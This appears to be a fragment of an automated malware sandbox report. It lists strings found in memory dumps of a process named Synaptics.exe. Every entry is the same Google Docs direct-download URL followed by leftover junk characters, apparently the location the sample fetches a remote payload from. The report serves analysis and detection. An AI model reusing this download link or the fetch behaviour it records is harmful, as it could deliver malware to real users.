                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUm
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUr_%
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUw_
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVP
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWM
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWZ
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXMVQG
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2348721322.000000001D7B2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYWPS
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYq#&0
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1745653784.0000000005447000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_3X
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_aKZ8
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_e
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_ex_d
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadacom%
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                            Source: Synaptics.exe, 0000001A.00000002.2285126784.000000000EEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadal
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaptcl
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadasur
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadat
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadavk
                            Source: Synaptics.exe, 00000007.00000003.1653439358.000000000546A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbP
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbd
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbert
                            Source: Synaptics.exe, 00000007.00000003.1653439358.0000000005443000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CH
                            Source: Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc-CHn
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CDE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcL
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcell
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadck.c
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadclie
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.cN
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.neX
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom0
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadconte
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadctinn
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcurit
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddJ
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddroid
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cn
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadds.cnc
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddyu
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                            Source: Synaptics.exe, 00000007.00000003.1630718381.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000002.1736596805.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade6
                            Source: Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeQ/%)
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeapi
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeappl1
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadearc
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadect-
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadectin
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellem
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadellemQ
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo$
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadentOn
                            Source: Synaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadent_C
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeqo&-
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaderse
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadert
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetle
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000070D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlens
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000710F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrce.
                            Source: Synaptics.exe, 0000001A.00000003.1883469824.0000000004C90000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrl.go
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrojecb
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrs
                            Source: Synaptics.exe, 0000001A.00000003.1885029748.0000000004C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrsion
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.000000000714F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads.cn
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads;
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.000000000076D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadservi
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsluAtV
                            Source: Synaptics.exe, 0000001A.00000003.1884018125.0000000007097000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2248767553.00000000071A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2285126784.000000000EEED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt2.com
                            Source: Synaptics.exe, 0000001A.00000002.2232844486.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt6
                            Source: Synaptics.exe, 00000007.00000002.1736596805.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtZ
                            Source: Synaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtacom
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtlen
                            Source: Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp3~
                            Source: Synaptics.exe, 0000001A.00000002.2287110513.000000000EF88000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2283330221.000000000EE4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
